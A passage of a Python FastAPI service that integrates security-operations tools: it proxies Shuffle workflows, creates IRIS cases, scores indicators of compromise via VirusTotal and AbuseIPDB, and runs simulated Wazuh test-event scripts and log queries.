  634. response_model=ApiResponse,
  635. summary="Shuffle auth test",
  636. description="Validate Shuffle API key authentication.",
  637. )
  638. async def shuffle_auth_test() -> ApiResponse:
  639. try:
  640. result = await shuffle_adapter.auth_test()
  641. except Exception as exc:
  642. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  643. return ApiResponse(data={"shuffle": result})
  644. @app.post(
  645. "/shuffle/login",
  646. response_model=ApiResponse,
  647. summary="Shuffle login",
  648. description="Login to Shuffle with username/password and return auth response.",
  649. )
  650. async def shuffle_login(payload: ShuffleLoginRequest) -> ApiResponse:
  651. try:
  652. result = await shuffle_adapter.login(payload.username, payload.password)
  653. except Exception as exc:
  654. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  655. return ApiResponse(data={"shuffle": result})
  656. @app.post(
  657. "/shuffle/generate-apikey",
  658. response_model=ApiResponse,
  659. summary="Generate Shuffle API key",
  660. description="Login using provided or configured credentials and generate a Shuffle API key.",
  661. )
  662. async def shuffle_generate_apikey(payload: ShuffleLoginRequest | None = None) -> ApiResponse:
  663. username = payload.username if payload else settings.shuffle_username
  664. password = payload.password if payload else settings.shuffle_password
  665. if not username or not password:
  666. raise HTTPException(
  667. status_code=400,
  668. detail="Missing shuffle credentials. Provide username/password in body or set SHUFFLE_USERNAME and SHUFFLE_PASSWORD.",
  669. )
  670. try:
  671. result = await shuffle_adapter.generate_apikey_from_login(username, password)
  672. except Exception as exc:
  673. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  674. return ApiResponse(data={"shuffle": result})
  675. @app.get(
  676. "/shuffle/workflows",
  677. response_model=ApiResponse,
  678. summary="List Shuffle workflows",
  679. description="List available workflows in Shuffle using configured API key.",
  680. )
  681. async def shuffle_workflows() -> ApiResponse:
  682. try:
  683. result = await shuffle_adapter.list_workflows()
  684. except Exception as exc:
  685. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  686. return ApiResponse(data={"shuffle": result})
  687. @app.get(
  688. "/shuffle/workflows/{workflow_id}",
  689. response_model=ApiResponse,
  690. summary="Get Shuffle workflow",
  691. description="Get a single Shuffle workflow definition by workflow ID.",
  692. )
  693. async def shuffle_workflow(workflow_id: str) -> ApiResponse:
  694. try:
  695. result = await shuffle_adapter.get_workflow(workflow_id)
  696. except Exception as exc:
  697. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  698. return ApiResponse(data={"shuffle": result})
  699. @app.post(
  700. "/shuffle/workflows/{workflow_id}/execute",
  701. response_model=ApiResponse,
  702. summary="Execute Shuffle workflow",
  703. description="Execute a specific Shuffle workflow with custom JSON payload.",
  704. )
  705. async def shuffle_workflow_execute(
  706. workflow_id: str, payload: dict[str, object]
  707. ) -> ApiResponse:
  708. try:
  709. result = await shuffle_adapter.trigger_workflow(workflow_id=workflow_id, payload=payload)
  710. except Exception as exc:
  711. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  712. return ApiResponse(data={"shuffle": result})
  713. @app.get(
  714. "/shuffle/apps",
  715. response_model=ApiResponse,
  716. summary="List Shuffle apps",
  717. description="List installed/available Shuffle apps from app API.",
  718. )
  719. async def shuffle_apps() -> ApiResponse:
  720. try:
  721. result = await shuffle_adapter.list_apps()
  722. except Exception as exc:
  723. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  724. return ApiResponse(data={"shuffle": result})
  725. @app.post(
  726. "/shuffle/proxy",
  727. response_model=ApiResponse,
  728. summary="Proxy request to Shuffle API",
  729. description="Forward arbitrary HTTP request to Shuffle API path via configured credentials.",
  730. )
  731. async def shuffle_proxy(payload: ShuffleProxyRequest) -> ApiResponse:
  732. path = payload.path if payload.path.startswith("/api/") else f"/api/v1/{payload.path.lstrip('/')}"
  733. try:
  734. result = await shuffle_adapter.proxy(
  735. method=payload.method,
  736. path=path,
  737. params=payload.params,
  738. payload=payload.payload,
  739. )
  740. except Exception as exc:
  741. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  742. return ApiResponse(data={"shuffle": result})
  743. @app.post(
  744. "/action/create-iris-case",
  745. response_model=ApiResponse,
  746. summary="Create IRIS case (action)",
  747. description="Create an IRIS case using action payload fields and defaults.",
  748. )
  749. async def create_iris_case(payload: ActionCreateIncidentRequest) -> ApiResponse:
  750. # IRIS v2 expects case_name, case_description, case_customer, case_soc_id.
  751. case_payload = {
  752. "case_name": payload.title,
  753. "case_description": payload.payload.get("description", "Created by soc-integrator"),
  754. "case_customer": payload.payload.get("case_customer", settings.iris_default_customer_id),
  755. "case_soc_id": payload.payload.get("case_soc_id", settings.iris_default_soc_id),
  756. }
  757. try:
  758. iris_result = await iris_adapter.create_case(case_payload)
  759. except Exception as exc:
  760. raise HTTPException(status_code=502, detail=f"IRIS call failed: {exc}") from exc
  761. return ApiResponse(data={"iris": iris_result})
  762. @app.post(
  763. "/iris/tickets",
  764. response_model=ApiResponse,
  765. summary="Create IRIS ticket",
  766. description="Create an IRIS case/ticket directly using ticket request model.",
  767. )
  768. async def iris_create_ticket(payload: IrisTicketCreateRequest) -> ApiResponse:
  769. case_payload = {
  770. "case_name": payload.title,
  771. "case_description": payload.description,
  772. "case_customer": payload.case_customer or settings.iris_default_customer_id,
  773. "case_soc_id": payload.case_soc_id or settings.iris_default_soc_id,
  774. }
  775. if payload.payload:
  776. case_payload.update(payload.payload)
  777. try:
  778. iris_result = await iris_adapter.create_case(case_payload)
  779. except Exception as exc:
  780. raise HTTPException(status_code=502, detail=f"IRIS call failed: {exc}") from exc
  781. return ApiResponse(data={"iris": iris_result})
  782. @app.get(
  783. "/iris/tickets",
  784. response_model=ApiResponse,
  785. summary="List IRIS tickets",
  786. description="List IRIS cases with pagination, using v2 or legacy fallback endpoint.",
  787. )
  788. async def iris_list_tickets(limit: int = 50, offset: int = 0) -> ApiResponse:
  789. try:
  790. iris_result = await iris_adapter.list_cases(limit=limit, offset=offset)
  791. except Exception as exc:
  792. raise HTTPException(status_code=502, detail=f"IRIS call failed: {exc}") from exc
  793. return ApiResponse(data={"iris": iris_result})
  794. def _build_vt_ioc_result(
  795. vt: dict[str, object],
  796. ioc_type: str,
  797. ioc_value: str,
  798. malicious_threshold: int,
  799. suspicious_threshold: int,
  800. ) -> tuple[dict[str, object], bool, str, float]:
  801. stats = (
  802. (((vt.get("data") or {}).get("attributes") or {}).get("last_analysis_stats"))
  803. if isinstance(vt, dict)
  804. else None
  805. ) or {}
  806. malicious = int(stats.get("malicious", 0) or 0)
  807. suspicious = int(stats.get("suspicious", 0) or 0)
  808. harmless = int(stats.get("harmless", 0) or 0)
  809. undetected = int(stats.get("undetected", 0) or 0)
  810. total = malicious + suspicious + harmless + undetected
  811. confidence = 0.0 if total == 0 else round(((malicious + (0.5 * suspicious)) / total), 4)
  812. matched = (malicious >= malicious_threshold) or (suspicious >= suspicious_threshold)
  813. severity = "low"
  814. if malicious >= 5 or suspicious >= 10:
  815. severity = "critical"
  816. elif malicious >= 2 or suspicious >= 5:
  817. severity = "high"
  818. elif malicious >= 1 or suspicious >= 1:
  819. severity = "medium"
  820. reason = (
  821. f"virustotal_stats malicious={malicious} suspicious={suspicious} "
  822. f"thresholds(malicious>={malicious_threshold}, suspicious>={suspicious_threshold})"
  823. )
  824. result: dict[str, object] = {
  825. "ioc_type": ioc_type,
  826. "ioc_value": ioc_value,
  827. "matched": matched,
  828. "severity": severity,
  829. "confidence": confidence,
  830. "reason": reason,
  831. "providers": {
  832. "virustotal": {
  833. "stats": stats,
  834. }
  835. },
  836. "raw": {
  837. "virustotal": vt,
  838. },
  839. }
  840. return result, matched, severity, confidence
  841. def _build_abuseipdb_ioc_result(
  842. abuse: dict[str, object],
  843. ioc_value: str,
  844. confidence_threshold: int = 50,
  845. ) -> tuple[dict[str, object], bool, str, float]:
  846. data = ((abuse.get("data") if isinstance(abuse, dict) else None) or {}) if isinstance(abuse, dict) else {}
  847. score = int(data.get("abuseConfidenceScore", 0) or 0)
  848. total_reports = int(data.get("totalReports", 0) or 0)
  849. matched = score >= confidence_threshold
  850. severity = "low"
  851. if score >= 90:
  852. severity = "critical"
  853. elif score >= 70:
  854. severity = "high"
  855. elif score >= 30:
  856. severity = "medium"
  857. confidence = round(score / 100.0, 4)
  858. reason = f"abuseipdb score={score} totalReports={total_reports} threshold>={confidence_threshold}"
  859. result: dict[str, object] = {
  860. "ioc_type": "ip",
  861. "ioc_value": ioc_value,
  862. "matched": matched,
  863. "severity": severity,
  864. "confidence": confidence,
  865. "reason": reason,
  866. "providers": {"abuseipdb": {"score": score, "totalReports": total_reports, "raw": abuse}},
  867. }
  868. return result, matched, severity, confidence
  869. def _extract_first_array(payload: object) -> list[object]:
  870. if isinstance(payload, list):
  871. return payload
  872. if not isinstance(payload, dict):
  873. return []
  874. preferred_keys = [
  875. "items",
  876. "results",
  877. "workflows",
  878. "apps",
  879. "affected_items",
  880. "data",
  881. ]
  882. for key in preferred_keys:
  883. value = payload.get(key)
  884. if isinstance(value, list):
  885. return value
  886. for value in payload.values():
  887. extracted = _extract_first_array(value)
  888. if extracted:
  889. return extracted
  890. return []
  891. SIM_SCRIPT_MAP: dict[str, str] = {
  892. "fortigate": "send-wazuh-fortigate-test-events.sh",
  893. "endpoint": "send-wazuh-endpoint-agent-test-events.sh",
  894. "cisco": "send-wazuh-cisco-test-events.sh",
  895. "proposal_required": "send-wazuh-proposal-required-events.sh",
  896. "proposal_appendix_b": "send-wazuh-proposal-appendix-b-events.sh",
  897. "proposal_appendix_c": "send-wazuh-proposal-appendix-c-events.sh",
  898. "wazuh_test": "send-wazuh-test-events.sh",
  899. }
  900. def _build_sim_command(payload: SimLogRunRequest) -> list[str]:
  901. script_name = SIM_SCRIPT_MAP[payload.script]
  902. script_path = SIM_SCRIPTS_DIR / script_name
  903. count = max(1, int(payload.count))
  904. delay = max(0.0, float(payload.delay_seconds))
  905. if payload.script == "endpoint":
  906. cmd = [
  907. "/bin/bash",
  908. str(script_path),
  909. payload.target or "all",
  910. payload.scenario or "all",
  911. str(count),
  912. str(delay),
  913. ]
  914. else:
  915. cmd = [
  916. "/bin/bash",
  917. str(script_path),
  918. payload.target or "all",
  919. str(count),
  920. str(delay),
  921. ]
  922. if payload.forever:
  923. cmd.append("--forever")
  924. return cmd
  925. def _serialize_sim_run(run_id: str, run: dict[str, object]) -> dict[str, object]:
  926. process = run.get("process")
  927. poll_code = process.poll() if process else None
  928. return_code = run.get("return_code")
  929. if poll_code is not None and return_code is None:
  930. run["return_code"] = poll_code
  931. return_code = poll_code
  932. return {
  933. "run_id": run_id,
  934. "script": run.get("script"),
  935. "target": run.get("target"),
  936. "scenario": run.get("scenario"),
  937. "count": run.get("count"),
  938. "delay_seconds": run.get("delay_seconds"),
  939. "forever": run.get("forever"),
  940. "pid": run.get("pid"),
  941. "cmd": run.get("cmd"),
  942. "started_at": run.get("started_at"),
  943. "stopped_at": run.get("stopped_at"),
  944. "running": bool(process and process.poll() is None),
  945. "return_code": return_code,
  946. "log_file": run.get("log_file"),
  947. }
  948. def _tail_log_lines(path: Path, limit: int = 200) -> list[str]:
  949. line_limit = max(1, min(int(limit), 1000))
  950. lines: deque[str] = deque(maxlen=line_limit)
  951. try:
  952. with path.open("r", encoding="utf-8", errors="replace") as handle:
  953. for line in handle:
  954. lines.append(line.rstrip("\n"))
  955. except FileNotFoundError:
  956. return []
  957. return list(lines)
  958. def _safe_query_token(value: object) -> str | None:
  959. text = str(value or "").strip()
  960. if not text:
  961. return None
  962. if not re.fullmatch(r"[A-Za-z0-9_.:-]+", text):
  963. return None
  964. return text
  965. def _parse_iso_datetime(value: object) -> datetime | None:
  966. text = str(value or "").strip()
  967. if not text:
  968. return None
  969. if text.endswith("Z"):
  970. text = text[:-1] + "+00:00"
  971. try:
  972. parsed = datetime.fromisoformat(text)
  973. except ValueError:
  974. return None
  975. if parsed.tzinfo is None:
  976. parsed = parsed.replace(tzinfo=timezone.utc)
  977. return parsed.astimezone(timezone.utc)
  978. def _sim_wazuh_query_clauses(run: dict[str, object]) -> list[str]:
  979. script = str(run.get("script") or "").strip().lower()
  980. target = str(run.get("target") or "all").strip()
  981. scenario = str(run.get("scenario") or "all").strip().lower()
  982. target_token = _safe_query_token(target)
  983. _ = scenario
  984. clauses: list[str] = ["(full_log:*soc_mvp_test=true* OR data.soc_mvp_test:true)"]
  985. if script == "fortigate":
  986. clauses.append(
  987. "(full_log:*fortigate* OR full_log:*FGT80F* OR full_log:*FGT60F* OR full_log:*FGT40F* "
  988. "OR full_log:*FGT501E* OR data.vendor:fortinet OR data.product:fortigate OR data.source:fortigate)"
  989. )
  990. if target_token and target_token.lower() != "all":
  991. clauses.append(f"(full_log:*{target_token}* OR data.model:{target_token})")
  992. elif script == "endpoint":
  993. if target_token and target_token.lower() != "all":
  994. lowered = target_token.lower()
  995. if lowered in {"windows", "win"}:
  996. clauses.append(
  997. "(full_log:*source=windows* OR full_log:*source=windows_agent* "
  998. "OR data.source:windows OR data.source:windows_agent OR data.platform:windows)"
  999. )
  1000. elif lowered in {"mac", "macos"}:
  1001. clauses.append(
  1002. "(full_log:*source=mac* OR full_log:*source=mac_agent* "
  1003. "OR data.source:mac OR data.source:mac_agent OR data.platform:mac)"
  1004. )
  1005. elif lowered == "linux":
  1006. clauses.append(
  1007. "(full_log:*source=linux* OR full_log:*source=linux_agent* "
  1008. "OR data.source:linux OR data.source:linux_agent OR data.platform:linux)"
  1009. )
  1010. else:
  1011. clauses.append(f"full_log:*{target_token}*")
  1012. else:
  1013. clauses.append(
  1014. "(full_log:*source=windows* OR full_log:*source=windows_agent* "
  1015. "OR full_log:*source=mac* OR full_log:*source=mac_agent* "
  1016. "OR full_log:*source=linux* OR full_log:*source=linux_agent* "
  1017. "OR data.source:windows OR data.source:windows_agent "
  1018. "OR data.source:mac OR data.source:mac_agent "
  1019. "OR data.source:linux OR data.source:linux_agent)"
  1020. )
  1021. elif script == "cisco":
  1022. clauses.append("(full_log:*cisco* OR data.vendor:cisco)")
  1023. if target_token and target_token.lower() != "all":
  1024. clauses.append(f"full_log:*{target_token}*")
  1025. elif script in {"proposal_required", "proposal_appendix_b", "proposal_appendix_c", "wazuh_test"}:
  1026. clauses.append("(full_log:*soc_mvp_test=true* OR data.soc_mvp_test:true)")
  1027. if target_token and target_token.lower() != "all":
  1028. clauses.append(f"full_log:*{target_token}*")
  1029. else:
  1030. clauses.append("full_log:*soc_mvp_test=true*")
  1031. return clauses
  1032. def _extract_wazuh_hits(payload: object) -> list[dict[str, object]]:
  1033. if not isinstance(payload, dict):
  1034. return []
  1035. hits_root = payload.get("hits")
  1036. if not isinstance(hits_root, dict):
  1037. return []
  1038. hits = hits_root.get("hits")
  1039. if not isinstance(hits, list):
  1040. return []
  1041. result: list[dict[str, object]] = []
  1042. for hit in hits:
  1043. if isinstance(hit, dict):
  1044. result.append(hit)
  1045. return result
  1046. def _extract_wazuh_event_item(hit: dict[str, object], include_raw: bool) -> dict[str, object]:
  1047. source = hit.get("_source") if isinstance(hit.get("_source"), dict) else {}
  1048. source = source if isinstance(source, dict) else {}
  1049. agent = source.get("agent") if isinstance(source.get("agent"), dict) else {}
  1050. agent = agent if isinstance(agent, dict) else {}
  1051. decoder = source.get("decoder") if isinstance(source.get("decoder"), dict) else {}
  1052. decoder = decoder if isinstance(decoder, dict) else {}
  1053. data = source.get("data") if isinstance(source.get("data"), dict) else {}
  1054. data = data if isinstance(data, dict) else {}
  1055. rule = source.get("rule") if isinstance(source.get("rule"), dict) else {}
  1056. rule = rule if isinstance(rule, dict) else {}
  1057. item: dict[str, object] = {
  1058. "@timestamp": source.get("@timestamp") or source.get("timestamp"),
  1059. "event_id": data.get("event_id") or source.get("id") or hit.get("_id"),
  1060. "agent_name": agent.get("name"),
  1061. "agent_id": agent.get("id"),
  1062. "decoder_name": decoder.get("name"),
  1063. "source": data.get("source"),
  1064. "event_type": data.get("event_type"),
  1065. "severity": data.get("severity"),
  1066. "rule_id": rule.get("id"),
  1067. "rule_description": rule.get("description"),
  1068. "full_log": source.get("full_log"),
  1069. }
  1070. if include_raw:
  1071. item["raw"] = source
  1072. return item
  1073. def _extract_wazuh_rule_item(hit: dict[str, object], include_raw: bool) -> dict[str, object] | None:
  1074. source = hit.get("_source") if isinstance(hit.get("_source"), dict) else {}
  1075. source = source if isinstance(source, dict) else {}
  1076. rule = source.get("rule") if isinstance(source.get("rule"), dict) else {}
  1077. rule = rule if isinstance(rule, dict) else {}
  1078. rule_id = rule.get("id")
  1079. if rule_id in {None, ""}:
  1080. return None
  1081. agent = source.get("agent") if isinstance(source.get("agent"), dict) else {}
  1082. agent = agent if isinstance(agent, dict) else {}
  1083. data = source.get("data") if isinstance(source.get("data"), dict) else {}
  1084. data = data if isinstance(data, dict) else {}
  1085. item: dict[str, object] = {
  1086. "@timestamp": source.get("@timestamp") or source.get("timestamp"),
  1087. "rule_id": rule_id,
  1088. "rule_level": rule.get("level"),
  1089. "rule_description": rule.get("description"),
  1090. "rule_firedtimes": rule.get("firedtimes"),
  1091. "event_id": data.get("event_id") or source.get("id") or hit.get("_id"),
  1092. "agent_name": agent.get("name"),
  1093. "full_log": source.get("full_log"),
  1094. }
  1095. if include_raw:
  1096. item["raw"] = source
  1097. return item
  1098. @app.post(
  1099. "/ioc/enrich",
  1100. response_model=ApiResponse,
  1101. summary="IOC enrich",
  1102. description="Fetch enrichment data for IOC from selected providers without final verdict scoring.",
  1103. )
  1104. async def ioc_enrich(payload: IocEnrichRequest) -> ApiResponse:
  1105. providers = [p.lower().strip() for p in payload.providers]
  1106. result: dict[str, object] = {
  1107. "ioc_type": payload.ioc_type,
  1108. "ioc_value": payload.ioc_value,
  1109. "providers_requested": providers,
  1110. "providers": {},
  1111. }
  1112. if "virustotal" in providers:
  1113. try:
  1114. vt = await virustotal_adapter.enrich_ioc(payload.ioc_type, payload.ioc_value)
  1115. result["providers"] = {**(result.get("providers") or {}), "virustotal": vt}
  1116. except Exception as exc:
  1117. repo.add_ioc_trace(
  1118. action="enrich",
  1119. ioc_type=payload.ioc_type,
  1120. ioc_value=payload.ioc_value,
  1121. providers=providers,
  1122. request_payload=payload.model_dump(mode="json"),
  1123. response_payload={},
  1124. error=str(exc),
  1125. )
  1126. raise HTTPException(status_code=502, detail=f"VirusTotal call failed: {exc}") from exc
  1127. if "abuseipdb" in providers:
  1128. if payload.ioc_type != "ip":
  1129. result["providers"] = {
  1130. **(result.get("providers") or {}),
  1131. "abuseipdb": {"skipped": "AbuseIPDB currently supports ioc_type='ip' only"},
  1132. }
  1133. else:
  1134. try:
  1135. abuse = await abuseipdb_adapter.check_ip(payload.ioc_value)
  1136. result["providers"] = {**(result.get("providers") or {}), "abuseipdb": abuse}
  1137. except Exception as exc:
  1138. repo.add_ioc_trace(
  1139. action="enrich",
  1140. ioc_type=payload.ioc_type,
  1141. ioc_value=payload.ioc_value,
  1142. providers=providers,
  1143. request_payload=payload.model_dump(mode="json"),
  1144. response_payload={},
  1145. error=str(exc),
  1146. )
  1147. raise HTTPException(status_code=502, detail=f"AbuseIPDB call failed: {exc}") from exc
  1148. repo.add_ioc_trace(
  1149. action="enrich",
  1150. ioc_type=payload.ioc_type,
  1151. ioc_value=payload.ioc_value,
  1152. providers=providers,
  1153. request_payload=payload.model_dump(mode="json"),
  1154. response_payload=result,
  1155. )
  1156. return ApiResponse(data={"ioc": result})
  1157. @app.post(
  1158. "/ioc/evaluate",
  1159. response_model=ApiResponse,
  1160. summary="IOC evaluate",
  1161. description="Evaluate IOC against selected intelligence providers and return matched/severity/confidence.",
  1162. )
  1163. async def ioc_evaluate(payload: IocEvaluateRequest) -> ApiResponse:
  1164. providers = [p.lower().strip() for p in payload.providers]
  1165. supported = {"virustotal", "abuseipdb"}
  1166. requested = [p for p in providers if p in supported]
  1167. if not requested:
  1168. raise HTTPException(status_code=400, detail="No supported provider requested. Use ['virustotal'] or ['abuseipdb'].")
  1169. per_provider: dict[str, dict[str, object]] = {}
  1170. errors: dict[str, str] = {}
  1171. if "virustotal" in requested:
  1172. try:
  1173. vt = await virustotal_adapter.enrich_ioc(payload.ioc_type, payload.ioc_value)
  1174. vt_result, _, _, _ = _build_vt_ioc_result(
  1175. vt=vt,
  1176. ioc_type=payload.ioc_type,
  1177. ioc_value=payload.ioc_value,
  1178. malicious_threshold=payload.malicious_threshold,
  1179. suspicious_threshold=payload.suspicious_threshold,
  1180. )
  1181. per_provider["virustotal"] = vt_result
  1182. except Exception as exc:
  1183. errors["virustotal"] = str(exc)
  1184. if "abuseipdb" in requested:
  1185. if payload.ioc_type != "ip":
  1186. errors["abuseipdb"] = "AbuseIPDB supports ioc_type='ip' only"
  1187. else:
  1188. try:
  1189. abuse = await abuseipdb_adapter.check_ip(payload.ioc_value)
  1190. abuse_result, _, _, _ = _build_abuseipdb_ioc_result(
  1191. abuse=abuse,
  1192. ioc_value=payload.ioc_value,
  1193. confidence_threshold=50,
  1194. )
  1195. per_provider["abuseipdb"] = abuse_result
  1196. except Exception as exc:
  1197. errors["abuseipdb"] = str(exc)
  1198. if not per_provider:
  1199. repo.add_ioc_trace(
  1200. action="evaluate",
  1201. ioc_type=payload.ioc_type,
  1202. ioc_value=payload.ioc_value,
  1203. providers=requested,
  1204. request_payload=payload.model_dump(mode="json"),
  1205. response_payload={},
  1206. error=str(errors),
  1207. )
  1208. raise HTTPException(status_code=502, detail=f"Provider evaluation failed: {errors}")
  1209. # aggregate decision (max confidence/severity, matched if any provider matched)
  1210. order = {"low": 1, "medium": 2, "high": 3, "critical": 4}
  1211. matched = any(bool(r.get("matched")) for r in per_provider.values())
  1212. confidence = max(float(r.get("confidence", 0.0) or 0.0) for r in per_provider.values())
  1213. severity = max((str(r.get("severity", "low")) for r in per_provider.values()), key=lambda x: order.get(x, 1))
  1214. reason_parts = [f"{name}:{res.get('reason','')}" for name, res in per_provider.items()]
  1215. if errors:
  1216. reason_parts.append(f"errors={errors}")
  1217. ioc_result = {
  1218. "ioc_type": payload.ioc_type,
  1219. "ioc_value": payload.ioc_value,
  1220. "matched": matched,
  1221. "severity": severity,
  1222. "confidence": round(confidence, 4),
  1223. "reason": " | ".join(reason_parts),
  1224. "providers": per_provider,
  1225. }
  1226. repo.add_ioc_trace(
  1227. action="evaluate",
  1228. ioc_type=payload.ioc_type,
  1229. ioc_value=payload.ioc_value,
  1230. providers=providers,
  1231. request_payload=payload.model_dump(mode="json"),
  1232. response_payload=ioc_result,
  1233. matched=matched,
  1234. severity=severity,
  1235. confidence=float(ioc_result["confidence"]),
  1236. )
  1237. return ApiResponse(data={"ioc": ioc_result})
  1238. @app.post(
  1239. "/ioc/upload-file",
  1240. response_model=ApiResponse,
  1241. summary="Upload file to VirusTotal",
  1242. description="Upload a file sample to VirusTotal and return upload/analysis identifiers.",
  1243. )
  1244. async def ioc_upload_file(file: UploadFile = File(...)) -> ApiResponse:
  1245. content = await file.read()
  1246. if not content:
  1247. raise HTTPException(status_code=400, detail="Uploaded file is empty")
  1248. try:
  1249. vt_upload = await virustotal_adapter.upload_file(file.filename or "upload.bin", content)
  1250. except Exception as exc:
  1251. repo.add_ioc_trace(
  1252. action="upload_file",
  1253. ioc_type="hash",
  1254. ioc_value=file.filename or "<unknown>",
  1255. providers=["virustotal"],
  1256. request_payload={"filename": file.filename, "size": len(content)},
  1257. response_payload={},
  1258. error=str(exc),
  1259. )
  1260. raise HTTPException(status_code=502, detail=f"VirusTotal upload failed: {exc}") from exc
  1261. repo.add_ioc_trace(
  1262. action="upload_file",
  1263. ioc_type="hash",
  1264. ioc_value=file.filename or "<unknown>",
  1265. providers=["virustotal"],
  1266. request_payload={"filename": file.filename, "size": len(content)},
  1267. response_payload=vt_upload if isinstance(vt_upload, dict) else {"raw": str(vt_upload)},
  1268. )
  1269. return ApiResponse(data={"virustotal": vt_upload})
  1270. @app.get(
  1271. "/ioc/analysis/{analysis_id}",
  1272. response_model=ApiResponse,
  1273. summary="Get VirusTotal analysis",
  1274. description="Fetch analysis status/details from VirusTotal by analysis ID.",
  1275. )
  1276. async def ioc_get_analysis(analysis_id: str) -> ApiResponse:
  1277. try:
  1278. vt_analysis = await virustotal_adapter.get_analysis(analysis_id)
  1279. except Exception as exc:
  1280. repo.add_ioc_trace(
  1281. action="analysis",
  1282. ioc_type="hash",
  1283. ioc_value=analysis_id,
  1284. providers=["virustotal"],
  1285. request_payload={"analysis_id": analysis_id},
  1286. response_payload={},
  1287. error=str(exc),
  1288. )
  1289. raise HTTPException(status_code=502, detail=f"VirusTotal analysis fetch failed: {exc}") from exc
  1290. repo.add_ioc_trace(
  1291. action="analysis",
  1292. ioc_type="hash",
  1293. ioc_value=analysis_id,
  1294. providers=["virustotal"],
  1295. request_payload={"analysis_id": analysis_id},
  1296. response_payload=vt_analysis if isinstance(vt_analysis, dict) else {"raw": str(vt_analysis)},
  1297. )
  1298. return ApiResponse(data={"virustotal": vt_analysis})
  1299. @app.post(
  1300. "/ioc/evaluate-file",
  1301. response_model=ApiResponse,
  1302. summary="Evaluate uploaded file IOC",
  1303. description="Upload a file, poll analysis completion, fetch final file report, and return IOC verdict.",
  1304. )
  1305. async def ioc_evaluate_file(
  1306. file: UploadFile = File(...),
  1307. malicious_threshold: int = 1,
  1308. suspicious_threshold: int = 3,
  1309. poll_timeout_seconds: int = 30,
  1310. poll_interval_seconds: int = 2,
  1311. ) -> ApiResponse:
  1312. content = await file.read()
  1313. if not content:
  1314. raise HTTPException(status_code=400, detail="Uploaded file is empty")
  1315. try:
  1316. vt_upload = await virustotal_adapter.upload_file(file.filename or "upload.bin", content)
  1317. except Exception as exc:
  1318. repo.add_ioc_trace(
  1319. action="evaluate_file",
  1320. ioc_type="hash",
  1321. ioc_value=file.filename or "<unknown>",
  1322. providers=["virustotal"],
  1323. request_payload={"filename": file.filename, "size": len(content)},
  1324. response_payload={},
  1325. error=str(exc),
  1326. )
  1327. raise HTTPException(status_code=502, detail=f"VirusTotal upload failed: {exc}") from exc
  1328. analysis_id = (
  1329. (((vt_upload.get("data") or {}).get("id")) if isinstance(vt_upload, dict) else None)
  1330. or ""
  1331. )
  1332. if not analysis_id:
  1333. raise HTTPException(status_code=502, detail="VirusTotal upload response missing analysis ID")
  1334. timeout = max(1, poll_timeout_seconds)
  1335. interval = max(1, poll_interval_seconds)
  1336. elapsed = 0
  1337. analysis: dict[str, object] = {}
  1338. while elapsed <= timeout:
  1339. analysis = await virustotal_adapter.get_analysis(analysis_id)
  1340. status = (
  1341. (((analysis.get("data") or {}).get("attributes") or {}).get("status"))
  1342. if isinstance(analysis, dict)
  1343. else None
  1344. )
  1345. if status == "completed":
  1346. break
  1347. await asyncio.sleep(interval)
  1348. elapsed += interval
  1349. sha256 = (
  1350. (((analysis.get("meta") or {}).get("file_info") or {}).get("sha256"))
  1351. if isinstance(analysis, dict)
  1352. else None
  1353. )
  1354. if not sha256:
  1355. raise HTTPException(status_code=502, detail="VirusTotal analysis did not return file hash yet")
  1356. try:
  1357. vt_file = await virustotal_adapter.enrich_ioc("hash", str(sha256))
  1358. except Exception as exc:
  1359. repo.add_ioc_trace(
  1360. action="evaluate_file",
  1361. ioc_type="hash",
  1362. ioc_value=str(sha256),
  1363. providers=["virustotal"],
  1364. request_payload={"filename": file.filename, "analysis_id": analysis_id},
  1365. response_payload={"upload": vt_upload, "analysis": analysis},
  1366. error=str(exc),
  1367. )
  1368. raise HTTPException(status_code=502, detail=f"VirusTotal report fetch failed: {exc}") from exc
  1369. ioc_result, matched, severity, confidence = _build_vt_ioc_result(
  1370. vt=vt_file,
  1371. ioc_type="hash",
  1372. ioc_value=str(sha256),
  1373. malicious_threshold=malicious_threshold,
  1374. suspicious_threshold=suspicious_threshold,
  1375. )
  1376. ioc_result["analysis_id"] = analysis_id
  1377. ioc_result["filename"] = file.filename
  1378. repo.add_ioc_trace(
  1379. action="evaluate_file",
  1380. ioc_type="hash",
  1381. ioc_value=str(sha256),
  1382. providers=["virustotal"],
  1383. request_payload={"filename": file.filename, "analysis_id": analysis_id},
  1384. response_payload={
  1385. "upload": vt_upload,
  1386. "analysis": analysis,
  1387. "ioc": ioc_result,
  1388. },
  1389. matched=matched,
  1390. severity=severity,
  1391. confidence=confidence,
  1392. )
  1393. return ApiResponse(data={"ioc": ioc_result, "analysis": analysis, "upload": vt_upload})
  1394. @app.get(
  1395. "/ioc/history",
  1396. response_model=ApiResponse,
  1397. summary="IOC trace history",
  1398. description="List recent IOC enrichment/evaluation trace records stored in database.",
  1399. )
  1400. async def ioc_history(limit: int = 50, offset: int = 0) -> ApiResponse:
  1401. return ApiResponse(data={"items": repo.list_ioc_trace(limit=limit, offset=offset)})
  1402. @app.get(
  1403. "/geoip/{ip}",
  1404. response_model=ApiResponse,
  1405. summary="GeoIP lookup",
  1406. description="Lookup geolocation for a public IP address using configured GeoIP provider.",
  1407. )
  1408. async def geoip_lookup(ip: str) -> ApiResponse:
  1409. result = await geoip_adapter.lookup(ip)
  1410. return ApiResponse(data={"geoip": result})
  1411. @app.get(
  1412. "/sync/wazuh-version",
  1413. response_model=ApiResponse,
  1414. summary="Wazuh version",
  1415. description="Get Wazuh API/manager version information through adapter.",
  1416. )
  1417. async def sync_wazuh_version() -> ApiResponse:
  1418. try:
  1419. wazuh_result = await wazuh_adapter.get_version()
  1420. except Exception as exc:
  1421. raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc
  1422. return ApiResponse(data={"wazuh": wazuh_result})
  1423. @app.get(
  1424. "/wazuh/auth-test",
  1425. response_model=ApiResponse,
  1426. summary="Wazuh auth test",
  1427. description="Validate Wazuh API authentication using configured credentials.",
  1428. )
